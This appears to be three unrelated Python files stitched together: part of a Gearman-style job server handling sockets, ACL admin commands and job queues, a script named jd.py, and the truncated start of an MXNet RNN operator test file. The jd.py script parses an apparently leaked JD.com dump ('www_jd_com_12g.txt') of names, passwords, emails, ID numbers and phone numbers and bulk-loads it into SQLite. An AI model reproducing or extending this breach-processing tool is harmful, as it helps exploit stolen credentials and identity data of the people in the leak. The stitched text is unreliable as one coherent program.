self.socket.setsockopt(socket.SOL_SOCKET,
socket.SO_KEEPALIVE, 1)
self.socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE, tcp_keepidle)
self.socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPINTVL, tcp_keepintvl)
self.socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPCNT, tcp_keepcnt)
elif keepalive:
self.log.warning('Keepalive requested but not available '
'on this platform')
except socket.error:
self.socket = None
continue
try:
self.socket.bind(sa)
self.socket.listen(1)
except socket.error:
self.socket.close()
self.socket = None
continue
break
if self.socket is None:
raise Exception("Could not open socket")
if port == 0:
self.port = self.socket.getsockname()[1]
super(Server, self).__init__(server_id)
# Register the wake pipe so that we can break if we need to
# reconfigure connections
self.poll.register(self.wake_read, self.read_bitmask)
if server_id:
self.log = logging.getLogger("gear.Server.%s" % (self.client_id,))
else:
self.log = logging.getLogger("gear.Server")
if statsd_host:
if not statsd:
self.log.error("Unable to import statsd module")
self.statsd = None
else:
self.statsd = statsd.StatsClient(statsd_host,
statsd_port,
statsd_prefix)
else:
self.statsd = None
def _doConnectLoop(self):
while self.running:
try:
self.connectLoop()
except Exception:
self.log.exception("Exception in connect loop:")
time.sleep(1)
def connectLoop(self):
poll = select.poll()
bitmask = (select.POLLIN | select.POLLERR |
select.POLLHUP | select.POLLNVAL)
# Register the wake pipe so that we can break if we need to
# shutdown.
poll.register(self.connect_wake_read, bitmask)
poll.register(self.socket.fileno(), bitmask)
while self.running:
ret = poll.poll()
for fd, event in ret:
if fd == self.connect_wake_read:
self.log.debug("Accept woken by pipe")
while True:
if os.read(self.connect_wake_read, 1) == b'\n':
break
return
if event & select.POLLIN:
self.log.debug("Accepting new connection")
c, addr = self.socket.accept()
if self.use_ssl:
context = ssl.SSLContext(best_tls_version())
context.verify_mode = ssl.CERT_REQUIRED
context.load_cert_chain(self.ssl_cert, self.ssl_key)
context.load_verify_locations(self.ssl_ca)
c = context.wrap_socket(c, server_side=True)
conn = ServerConnection(addr, c, self.use_ssl,
self.client_id)
self.log.info("Accepted connection %s" % (conn,))
self.connections_condition.acquire()
try:
self.active_connections.append(conn)
self._registerConnection(conn)
self.connections_condition.notifyAll()
finally:
self.connections_condition.release()
def readFromConnection(self, conn):
while True:
self.log.debug("Processing input on %s" % conn)
try:
p = conn.readPacket()
except RetryIOError:
# Read operation would block, we're done until
# epoll flags this connection again
return
if p:
if isinstance(p, Packet):
self.handlePacket(p)
else:
self.handleAdminRequest(p)
else:
self.log.debug("Received no data on %s" % conn)
raise DisconnectError()
def writeToConnection(self, conn):
self.log.debug("Processing output on %s" % conn)
conn.sendQueuedData()
def _processPollEvent(self, conn, event):
# This should do whatever is necessary to process a connection
# that has triggered a poll event. It should generally not
# raise exceptions so as to avoid restarting the poll loop.
# The exception handlers here can raise exceptions and if they
# do, it's okay, the poll loop will be restarted.
try:
if event & (select.EPOLLERR | select.EPOLLHUP):
self.log.debug("Received error event on %s: %s" % (
conn, event))
raise DisconnectError()
if event & (select.POLLIN | select.POLLOUT):
self.readFromConnection(conn)
self.writeToConnection(conn)
except socket.error as e:
if e.errno == errno.ECONNRESET:
self.log.debug("Connection reset by peer: %s" % (conn,))
self._lostConnection(conn)
return
raise
except DisconnectError:
# Our inner method says we should quietly drop
# this connection
self._lostConnection(conn)
return
except Exception:
self.log.exception("Exception reading or writing "
"from %s:" % (conn,))
self._lostConnection(conn)
return
def _flushAllConnections(self):
# If we need to restart the poll loop, we need to make sure
# there are no pending data on any connection. Simulate poll
# in+out events on every connection.
#
# If this method raises an exception, the poll loop wil
# restart again.
#
# No need to get the lock since this is called within the poll
# loop and therefore the list in guaranteed never to shrink.
connections = self.active_connections[:]
for conn in connections:
self._processPollEvent(conn, select.POLLIN | select.POLLOUT)
def _doPollLoop(self):
# Outer run method of poll thread.
while self.running:
try:
self._pollLoop()
except Exception:
self.log.exception("Exception in poll loop:")
def _pollLoop(self):
# Inner method of poll loop.
self.log.debug("Preparing to poll")
# Ensure there are no pending data.
self._flushAllConnections()
while self.running:
self.log.debug("Polling %s connections" %
len(self.active_connections))
ret = self.poll.poll()
# Since we're using edge-triggering, we need to make sure
# that every file descriptor in 'ret' is processed.
for fd, event in ret:
if fd == self.wake_read:
# This means we're exiting, so we can ignore the
# rest of 'ret'.
self.log.debug("Woken by pipe")
while True:
if os.read(self.wake_read, 1) == b'\n':
break
return
# In the unlikely event this raises an exception, the
# loop will be restarted.
conn = self.connection_map[fd]
self._processPollEvent(conn, event)
def _shutdown(self):
super(Server, self)._shutdown()
os.write(self.connect_wake_write, b'1\n')
def _cleanup(self):
super(Server, self)._cleanup()
self.socket.close()
os.close(self.connect_wake_read)
os.close(self.connect_wake_write)
def _registerConnection(self, conn):
# Register the connection with the poll object
# Call while holding the connection condition
self.log.debug("Registering %s" % conn)
self.connection_map[conn.conn.fileno()] = conn
self.poll.register(conn.conn.fileno(), self.readwrite_bitmask)
def _unregisterConnection(self, conn):
# Unregister the connection with the poll object
# Call while holding the connection condition
self.log.debug("Unregistering %s" % conn)
fd = conn.conn.fileno()
if fd not in self.connection_map:
return
try:
self.poll.unregister(fd)
except KeyError:
pass
try:
del self.connection_map[fd]
except KeyError:
pass
def _lostConnection(self, conn):
# Called as soon as a connection is detected as faulty.
self.log.info("Marking %s as disconnected" % conn)
self.connections_condition.acquire()
self._unregisterConnection(conn)
try:
# NOTE(notmorgan): In the loop below it is possible to change the
# jobs list on the connection. In python 3 .values() is an iter not
# a static list, meaning that a change will break the for loop
# as the object being iterated on will have changed in size.
jobs = list(conn.related_jobs.values())
if conn in self.active_connections:
self.active_connections.remove(conn)
finally:
self.connections_condition.notifyAll()
self.connections_condition.release()
for job in jobs:
if job.worker_connection == conn:
# the worker disconnected, alert the client
try:
p = Packet(constants.REQ, constants.WORK_FAIL, job.handle)
if job.client_connection:
job.client_connection.sendPacket(p)
except Exception:
self.log.exception("Sending WORK_FAIL to client after "
"worker disconnect failed:")
self._removeJob(job)
try:
conn.conn.shutdown(socket.SHUT_RDWR)
except socket.error as e:
if e.errno != errno.ENOTCONN:
self.log.exception("Unable to shutdown socket "
"for connection %s" % (conn,))
except Exception:
self.log.exception("Unable to shutdown socket "
"for connection %s" % (conn,))
try:
conn.conn.close()
except Exception:
self.log.exception("Unable to close socket "
"for connection %s" % (conn,))
self._updateStats()
def _removeJob(self, job, dequeue=True):
# dequeue is tri-state: True, False, or a specific queue
if job.client_connection:
try:
del job.client_connection.related_jobs[job.handle]
except KeyError:
pass
if job.worker_connection:
try:
del job.worker_connection.related_jobs[job.handle]
except KeyError:
pass
try:
del self.jobs[job.handle]
except KeyError:
pass
if dequeue is True:
# Search all queues for the job
try:
self.high_queue.remove(job)
except ValueError:
pass
try:
self.normal_queue.remove(job)
except ValueError:
pass
try:
self.low_queue.remove(job)
except ValueError:
pass
elif dequeue is not False:
# A specific queue was supplied
dequeue.remove(job)
# If dequeue is false, no need to remove from any queue
self.total_jobs -= 1
if job.running:
self.running_jobs -= 1
else:
self.waiting_jobs -= 1
def getQueue(self):
"""Returns a copy of all internal queues in a flattened form.
:returns: The Gearman queue.
:rtype: list of :py:class:`WorkerJob`.
"""
ret = []
for queue in [self.high_queue, self.normal_queue, self.low_queue]:
ret += queue
return ret
def handleAdminRequest(self, request):
self.log.info("Received admin request %s" % (request,))
if request.command.startswith(b'cancel job'):
self.handleCancelJob(request)
elif request.command.startswith(b'status'):
self.handleStatus(request)
elif request.command.startswith(b'workers'):
self.handleWorkers(request)
elif request.command.startswith(b'acl list'):
self.handleACLList(request)
elif request.command.startswith(b'acl grant'):
self.handleACLGrant(request)
elif request.command.startswith(b'acl revoke'):
self.handleACLRevoke(request)
elif request.command.startswith(b'acl self-revoke'):
self.handleACLSelfRevoke(request)
self.log.debug("Finished handling admin request %s" % (request,))
def _cancelJob(self, request, job, queue):
if self.acl:
if not self.acl.canInvoke(request.connection.ssl_subject,
job.name):
self.log.info("Rejecting cancel job from %s for %s "
"due to ACL" %
(request.connection.ssl_subject, job.name))
request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
return
self._removeJob(job, dequeue=queue)
self._updateStats()
request.connection.sendRaw(b'OK\n')
return
def handleCancelJob(self, request):
words = request.command.split()
handle = words[2]
if handle in self.jobs:
for queue in [self.high_queue, self.normal_queue, self.low_queue]:
for job in queue:
if handle == job.handle:
return self._cancelJob(request, job, queue)
request.connection.sendRaw(b'ERR UNKNOWN_JOB\n')
def handleACLList(self, request):
if self.acl is None:
request.connection.sendRaw(b'ERR ACL_DISABLED\n')
return
for entry in self.acl.getEntries():
l = "%s\tregister=%s\tinvoke=%s\tgrant=%s\n" % (
entry.subject, entry.register, entry.invoke, entry.grant)
request.connection.sendRaw(l.encode('utf8'))
request.connection.sendRaw(b'.\n')
def handleACLGrant(self, request):
# acl grant register worker .*
words = request.command.split(None, 4)
verb = words[2]
subject = words[3]
if self.acl is None:
request.connection.sendRaw(b'ERR ACL_DISABLED\n')
return
if not self.acl.canGrant(request.connection.ssl_subject):
request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
return
try:
if verb == 'invoke':
self.acl.grantInvoke(subject, words[4])
elif verb == 'register':
self.acl.grantRegister(subject, words[4])
elif verb == 'grant':
self.acl.grantGrant(subject)
else:
request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
return
except ACLError as e:
self.log.info("Error in grant command: %s" % (e.message,))
request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
return
request.connection.sendRaw(b'OK\n')
def handleACLRevoke(self, request):
# acl revoke register worker
words = request.command.split()
verb = words[2]
subject = words[3]
if self.acl is None:
request.connection.sendRaw(b'ERR ACL_DISABLED\n')
return
if subject != request.connection.ssl_subject:
if not self.acl.canGrant(request.connection.ssl_subject):
request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
return
try:
if verb == 'invoke':
self.acl.revokeInvoke(subject)
elif verb == 'register':
self.acl.revokeRegister(subject)
elif verb == 'grant':
self.acl.revokeGrant(subject)
elif verb == 'all':
try:
self.acl.remove(subject)
except ACLError:
pass
else:
request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
return
except ACLError as e:
self.log.info("Error in revoke command: %s" % (e.message,))
request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
return
request.connection.sendRaw(b'OK\n')
def handleACLSelfRevoke(self, request):
# acl self-revoke register
words = request.command.split()
verb = words[2]
if self.acl is None:
request.connection.sendRaw(b'ERR ACL_DISABLED\n')
return
subject = request.connection.ssl_subject
try:
if verb == 'invoke':
self.acl.revokeInvoke(subject)
elif verb == 'register':
self.acl.revokeRegister(subject)
elif verb == 'grant':
self.acl.revokeGrant(subject)
elif verb == 'all':
try:
self.acl.remove(subject)
except ACLError:
pass
else:
request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
return
except ACLError as e:
self.log.info("Error in self-revoke command: %s" % (e.message,))
request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
return
request.connection.sendRaw(b'OK\n')
def _getFunctionStats(self):
functions = {}
for function in self.functions:
# Total, running, workers
functions[function] = [0, 0, 0]
for job in self.jobs.values():
if job.name not in functions:
functions[job.name] = [0, 0, 0]
functions[job.name][0] += 1
if job.running:
functions[job.name][1] += 1
for connection in self.active_connections:
for function in connection.functions:
if function not in functions:
functions[function] = [0, 0, 0]
functions[function][2] += 1
return functions
def handleStatus(self, request):
functions = self._getFunctionStats()
for name, values in functions.items():
request.connection.sendRaw(
("%s\t%s\t%s\t%s\n" %
(name.decode('utf-8'), values[0], values[1],
values[2])).encode('utf8'))
request.connection.sendRaw(b'.\n')
def handleWorkers(self, request):
for connection in self.active_connections:
fd = connection.conn.fileno()
ip = connection.host
client_id = connection.client_id or b'-'
functions = b' '.join(connection.functions).decode('utf8')
request.connection.sendRaw(("%s %s %s : %s\n" %
(fd, ip, client_id.decode('utf8'),
functions))
.encode('utf8'))
request.connection.sendRaw(b'.\n')
def wakeConnection(self, connection):
p = Packet(constants.RES, constants.NOOP, b'')
if connection.state == 'SLEEP':
connection.changeState("AWAKE")
connection.sendPacket(p)
def wakeConnections(self, job=None):
p = Packet(constants.RES, constants.NOOP, b'')
# Use a randomized copy of active_connections to try
# to spread workload across the machines that workers are on.
conns = self.active_connections[:]
random.shuffle(conns) # Modifies the list
for connection in conns:
if connection.state == 'SLEEP':
if ((job and job.name in connection.functions) or
(job is None)):
connection.changeState("AWAKE")
connection.sendPacket(p)
def reportTimingStats(self, ptype, duration):
"""Report processing times by packet type
This method is called by handlePacket to report how long
processing took for each packet. If statsd is configured,
timing and counts are reported with the key
"prefix.packet.NAME".
:arg bytes ptype: The packet type (one of the packet types in
constants).
:arg float duration: The time (in seconds) it took to process
the packet.
"""
if not self.statsd:
return
ptype = constants.types.get(ptype, 'UNKNOWN')
key = 'packet.%s' % ptype
self.statsd.timing(key, int(duration * 1000))
self.statsd.incr(key)
def _updateStats(self):
if not self.statsd:
return
# prefix.queue.total
# prefix.queue.running
# prefix.queue.waiting
self.statsd.gauge('queue.total', self.total_jobs)
self.statsd.gauge('queue.running', self.running_jobs)
self.statsd.gauge('queue.waiting', self.waiting_jobs)
def _handleSubmitJob(self, packet, precedence, background=False):
name = packet.getArgument(0)
unique = packet.getArgument(1)
if not unique:
unique = None
arguments = packet.getArgument(2, True)
if self.acl:
if not self.acl.canInvoke(packet.connection.ssl_subject, name):
self.log.info("Rejecting SUBMIT_JOB from %s for %s "
"due to ACL" %
(packet.connection.ssl_subject, name))
self.sendError(packet.connection, 0,
'Permission denied by ACL')
return
self.max_handle += 1
handle = ('H:%s:%s' % (packet.connection.host,
self.max_handle)).encode('utf8')
if not background:
conn = packet.connection
else:
conn = None
job = ServerJob(handle, name, arguments, conn, unique)
p = Packet(constants.RES, constants.JOB_CREATED, handle)
packet.connection.sendPacket(p)
self.jobs[handle] = job
self.total_jobs += 1
self.waiting_jobs += 1
if not background:
packet.connection.related_jobs[handle] = job
if precedence == PRECEDENCE_HIGH:
self.high_queue.append(job)
elif precedence == PRECEDENCE_NORMAL:
self.normal_queue.append(job)
elif precedence == PRECEDENCE_LOW:
self.low_queue.append(job)
self._updateStats()
self.wakeConnections(job)
def handleSubmitJob(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_NORMAL)
def handleSubmitJobHigh(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_HIGH)
def handleSubmitJobLow(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_LOW)
def handleSubmitJobBg(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_NORMAL,
background=True)
def handleSubmitJobHighBg(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_HIGH, background=True)
def handleSubmitJobLowBg(self, packet):
return self._handleSubmitJob(packet, PRECEDENCE_LOW, background=True)
def getJobForConnection(self, connection, peek=False):
for queue in [self.high_queue, self.normal_queue, self.low_queue]:
for job in queue:
if job.name in connection.functions:
if not peek:
queue.remove(job)
connection.related_jobs[job.handle] = job
job.worker_connection = connection
job.running = True
self.waiting_jobs -= 1
self.running_jobs += 1
self._updateStats()
return job
return None
def handleGrabJobUniq(self, packet):
job = self.getJobForConnection(packet.connection)
if job:
self.sendJobAssignUniq(packet.connection, job)
else:
self.sendNoJob(packet.connection)
def sendJobAssignUniq(self, connection, job):
unique = job.binary_unique
if not unique:
unique = b''
data = b'\x00'.join((job.handle, job.name, unique, job.arguments))
p = Packet(constants.RES, constants.JOB_ASSIGN_UNIQ, data)
connection.sendPacket(p)
def sendNoJob(self, connection):
p = Packet(constants.RES, constants.NO_JOB, b'')
connection.sendPacket(p)
def handlePreSleep(self, packet):
packet.connection.changeState("SLEEP")
if self.getJobForConnection(packet.connection, peek=True):
self.wakeConnection(packet.connection)
def handleWorkComplete(self, packet):
self.handlePassthrough(packet, True)
def handleWorkFail(self, packet):
self.handlePassthrough(packet, True)
def handleWorkException(self, packet):
self.handlePassthrough(packet, True)
def handleWorkData(self, packet):
self.handlePassthrough(packet)
def handleWorkWarning(self, packet):
self.handlePassthrough(packet)
def handleWorkStatus(self, packet):
handle = packet.getArgument(0)
job = self.jobs.get(handle)
if not job:
self.log.info("Received packet %s for unknown job" % (packet,))
return
job.numerator = packet.getArgument(1)
job.denominator = packet.getArgument(2)
self.handlePassthrough(packet)
def handlePassthrough(self, packet, finished=False):
handle = packet.getArgument(0)
job = self.jobs.get(handle)
if not job:
self.log.info("Received packet %s for unknown job" % (packet,))
return
packet.code = constants.RES
if job.client_connection:
job.client_connection.sendPacket(packet)
if finished:
self._removeJob(job, dequeue=False)
self._updateStats()
def handleSetClientID(self, packet):
name = packet.getArgument(0)
packet.connection.client_id = name
def sendError(self, connection, code, text):
data = (str(code).encode('utf8') + b'\x00' +
str(text).encode('utf8') + b'\x00')
p = Packet(constants.RES, constants.ERROR, data)
connection.sendPacket(p)
def handleCanDo(self, packet):
name = packet.getArgument(0)
if self.acl:
if not self.acl.canRegister(packet.connection.ssl_subject, name):
self.log.info("Ignoring CAN_DO from %s for %s due to ACL" %
(packet.connection.ssl_subject, name))
# CAN_DO normally does not merit a response so it is
# not clear that it is appropriate to send an ERROR
# response at this point.
return
self.log.debug("Adding function %s to %s" % (name, packet.connection))
packet.connection.functions.add(name)
self.functions.add(name)
def handleCantDo(self, packet):
name = packet.getArgument(0)
self.log.debug("Removing function %s from %s" %
(name, packet.connection))
packet.connection.functions.remove(name)
def handleResetAbilities(self, packet):
self.log.debug("Resetting functions for %s" % packet.connection)
packet.connection.functions = set()
def handleGetStatus(self, packet):
handle = packet.getArgument(0)
self.log.debug("Getting status for %s" % handle)
known = 0
running = 0
numerator = b''
denominator = b''
job = self.jobs.get(handle)
if job:
known = 1
if job.running:
running = 1
numerator = job.numerator or b''
denominator = job.denominator or b''
data = (handle + b'\x00' +
str(known).encode('utf8') + b'\x00' +
str(running).encode('utf8') + b'\x00' +
numerator + b'\x00' +
denominator)
p = Packet(constants.RES, constants.STATUS_RES, data)
packet.connection.sendPacket(p)
|
jd.py | import logging
import sqlite3
import threading
import time
class Converter(object):
def __init__(self, database_path, file_path):
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(message)s",
datefmt='%Y-%m-%d %H:%M:%S',
)
self.logger = logging.getLogger()
self.database_connection = None
self.database_path = database_path
self.file_path = file_path
self.file_rows = 0
self.handle_total = 0
self.handle_invalid = 0
self.handle_queue = 0
self.cancel_print_insertion_speed = None
def connect_database(self):
self.database_connection = sqlite3.connect(self.database_path)
def close_database(self):
self.database_connection.close()
def insert(self, id, name, nickname, password, email, id_number, phone_number):
cursor = self.database_connection.cursor()
try:
cursor.execute(
"INSERT INTO jd VALUES (?, ?, ?, ?, ?, ?, ?);",
(id, name, nickname, password, email, id_number, phone_number)
)
except sqlite3.IntegrityError:
self.handle_invalid += 1
finally:
self.handle_total += 1
self.handle_queue += 1
pass
def start_insertion_speed(self):
event = threading.Event()
def print_insertion_speed():
handle_total = self.handle_total
while not event.wait(1):
if self.handle_total - handle_total == 0:
continue
self.logger.info("{}/s, {}/{} progress, {} rows are invalid, {} seconds left".format(
self.handle_total - handle_total,
self.handle_total,
self.file_rows,
self.handle_invalid,
(self.file_rows - self.handle_total) / (self.handle_total - handle_total),
))
handle_total = self.handle_total
threading.Thread(target=print_insertion_speed).start()
return event.set
def start(self):
# Get the number of file rows
self.logger.info("start scanning file lines")
start_time = time.time()
with open(self.file_path) as file:
self.file_rows = 0
for _ in file:
self.file_rows += 1
end_time = time.time()
self.logger.info("scan completed, there are a total of {} lines, and it taken {} seconds".format(
self.file_rows,
end_time - start_time,
))
# Insert QQ and phone numbers
self.connect_database()
self.cancel_print_insertion_speed = self.start_insertion_speed()
with open(self.file_path) as file:
for line in file:
try:
dataset = line.strip().split("---")
name = dataset[0]
nickname = dataset[1]
password = dataset[2]
email = dataset[3]
id_number = dataset[4]
phone_number = dataset[5]
except IndexError:
self.handle_invalid += 1
pass
finally:
self.handle_total += 1
self.insert(self.handle_total, name, nickname, password, email, id_number, phone_number)
if self.handle_queue >= 400000:
self.database_connection.commit()
self.handle_queue = 0
self.database_connection.commit()
self.cancel_print_insertion_speed()
self.close_database()
self.logger.info("completed, insert {} rows, {} rows of invalid data".format(
self.handle_total,
self.handle_invalid,
))
exit()
if __name__ == '__main__':
converter = Converter("database/database.db", "www_jd_com_12g.txt")
converter.start()
|
test_operator.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if grad_req != 'null':
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
else:
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
T, N, I, H = 5, 20, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
